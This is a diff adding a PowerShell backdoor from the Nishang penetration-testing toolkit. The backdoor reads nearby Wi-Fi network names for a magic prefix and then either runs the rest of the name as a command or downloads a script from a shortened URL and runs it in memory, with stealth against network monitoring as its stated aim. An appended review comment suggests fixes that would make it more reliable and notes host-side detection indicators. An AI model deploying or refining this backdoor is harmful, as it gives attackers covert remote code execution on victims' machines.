1+ <# 
2+ . SYNOPSIS 
3+ Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names. 
4+ 
5+ . DESCRIPTION 
6+ Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of 
7+ each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and 
8+ exeucted. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and 
9+ executed in memory from the URL. See examples for usage.  
10+ 
11+ Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring.  
12+ 
13+ . PARAMETER  MagicString 
14+ The string which Gupt would compare with the available SSIDs.  
15+ 
16+ . PARAMETER  Arguments 
17+ Arguments to pass to a downloaded script. 
18+ 
19+ . EXAMPLE 
20+ PS > Gupt-Backdoor -MagicString op3n -Verbose 
21+ In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami". 
22+ 
23+ PS > Gupt-Backdoor -MagicString op3n -Verbose 
24+ In above, Gupt will look for an SSID starting with "op3n". To execute a powershell script on the target, the wireless network name should be 
25+ "op3nunJEuug". Here, Gupt will use of characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved 
26+ by the Google shortener would be downloaded and executed.  
27+ 
28+ . LINK 
29+ http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html 
30+ https://github.com/samratashok/nishang 
31+ #> 
32+ 
33+ function  Gupt-Backdoor 
34+ {
35+     [CmdletBinding ()] Param (
36+         
37+         [Parameter (Position = 0 ,  Mandatory  =  $True )]
38+         [String ]
39+         $MagicString , 
40+ 
41+         [Parameter (Position = 3 ,  Mandatory  =  $False )]
42+         [String ]
43+         $Arguments 
44+  
45+     )
46+     # Get list of available Wlan networks
47+     while ($True )
48+     {
49+         Write-Verbose  " Checking wireless networks for instructions." 
50+         $networks  =  Invoke-Expression  " netsh wlan show network" 
51+         $ssid  =  $networks  |  Select-String  " SSID" 
52+         $NetworkNames  =  $ssid  -replace  " .*:"   -replace  "  " 
53+         ForEach  ($network  in  $NetworkNames )
54+         {
55+             # Check if the first four characters of our SSID matches the given MagicString
56+             if  ($network.Substring  (0 , 4 ) -match  $MagicString.Substring  (0 , 4 ))
57+             {
58+                 Write-Verbose  " Found a network with instructions!" 
59+                 # If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL
60+                 if  ($network.Substring  (4 )[0 ] -eq  " u"  )
61+                 {
62+                     Write-Verbose  " Downloading the attack script and executing it in memory." 
63+                     $PayloadURL  =  " http://goo.gl/"   +  $network.Substring  (5 )
64+                     $webclient  =  New-Object  System.Net.WebClient
65+                     Invoke-Expression  $webclient.DownloadString  ($PayloadURL )
66+                     if  ($Arguments )
67+                     {
68+                         Invoke-Expression  $Arguments                    
69+                     }
70+                     Start-Sleep  - Seconds 10 
71+                 }
72+                 elseif  ($network.Substring  (4 )[0 ] -eq  " c"  )
73+                 {
74+                     $cmd  =   $network.Substring  (5 )
75+                     if  ($cmd  -eq  " exit"  )
76+                     {
77+                         break 
78+                     }
79+                     Write-Verbose  " Command `" $cmd `"  found. Executing it." 
80+                     Invoke-Expression  $cmd 
81+                     Start-Sleep  - Seconds 10 
82+                 }
83+             }
84+         }
85+         Start-Sleep  - Seconds 5 
86+     }
87+ }
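Review bot: The SSID matching in the ForEach loop has no length guard: `$network.Substring(0, 4)` throws an ArgumentOutOfRangeException for any visible SSID shorter than four characters, so every scan that sees such a network emits an error before the comparison runs; a `$network.Length -ge 5` check before the `if` would make the intent explicit. Two smaller points in the same block: `-match` treats `$MagicString.Substring(0, 4)` as a regular expression, so any regex metacharacter in the magic string widens the match beyond the literal four-character prefix the DESCRIPTION promises, and the `. PARAMETER Arguments` help text says the value is passed to the downloaded script, whereas the code runs `Invoke-Expression $Arguments` as a separate command after the download, which the documentation should state. For readers studying this as a detection case, note what the loop makes observable on a host: `netsh wlan show network` spawned from PowerShell every 5 seconds indefinitely, and `WebClient.DownloadString` output fed directly into `Invoke-Expression`, both of which are visible in script block and process creation logging.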